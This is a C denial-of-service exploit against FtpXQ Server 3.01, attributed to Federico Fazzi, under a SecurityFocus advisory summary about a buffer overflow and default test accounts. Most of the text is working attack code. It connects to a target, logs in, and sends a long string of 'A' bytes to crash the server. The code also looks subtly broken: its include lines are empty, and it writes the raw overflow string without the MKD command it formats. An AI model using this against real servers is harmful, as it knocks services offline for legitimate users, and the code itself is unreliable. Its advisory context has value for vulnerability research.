// source: https://www.securityfocus.com/bid/20721/info DataWizard FtpXQ Server is prone to multiple remote vulnerabilities: - A remote denial-of-service issue occurs because the application fails to perform adequate bounds checks on user-supplied data before copying it to an insufficiently sized buffer. An attacker could exploit this issue to crash the application, denying access to legitimate users. - The application creates two testing accounts by default. An attacker can access these accounts to gain read/write privileges on the server, which could result in the compromise of the affected computer. FtpXQ Server 3.01 is vulnerable; other version may also be affected. /* * 0xf_ftpxq.c - FTPXQ Denial of service exploit. * Federico Fazzi * * advisory by Eric Sesterhenn. * -- Server built using the WinsockQ from DataWizard Technologies. A security * -- vulnerability in the product allows remote attackers to overflow an * -- internal buffer by providing an overly long "make directory" request. * * r20061025. */ #include #include #include #include #include #include #include #include #include // AAAAAAAAAAAAAAAA..AA*255 in hex format. char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41"; int main(int argc, char **argv) { int sd; socklen_t len; struct sockaddr_in saddr; struct hostent *he; char buf[512], tmpbuf[128]; if(argc != 5) { printf("FTPXQ Server - Denial of service exploit.\n" "Federico Fazzi \n\n" "usage: %s \n", argv[0]); exit(1); } if((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); } // init socket if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); exit(1); } // setup struct bzero((char *) &saddr, sizeof(saddr)); saddr.sin_family = AF_INET; bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length); saddr.sin_port = htons(atoi(argv[2])); len = sizeof(struct sockaddr); // init connection if(connect(sd, (struct sockaddr *)&saddr, len) == -1) { perror("connect()"); exit(1); } printf("FTPXQ Server - Denial of service exploit.\n" "Federico Fazzi \n" "---------------------------------------\n"); puts("connecting..\t\t done"); // sending a USER data to daemon sprintf(buf, "USER %s\r\n", argv[3]); write(sd, buf, strlen(buf)); puts("sending USER data..\t done"); // sending a PASS data to daemon sprintf(buf, "PASS %s\r\n", argv[4]); write(sd, buf, strlen(buf)); puts("sending PASS data..\t done"); // sending a BOF string with MKD command to host sprintf(buf, "MKD %s", bof); write(sd, bof, strlen(bof)); puts("sending MKD bof string.. done"); // now checking if server i down if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0) puts("[!] server doesn't vulnerable"); else puts("[+] server getting down.. done"); close(sd); return(0); }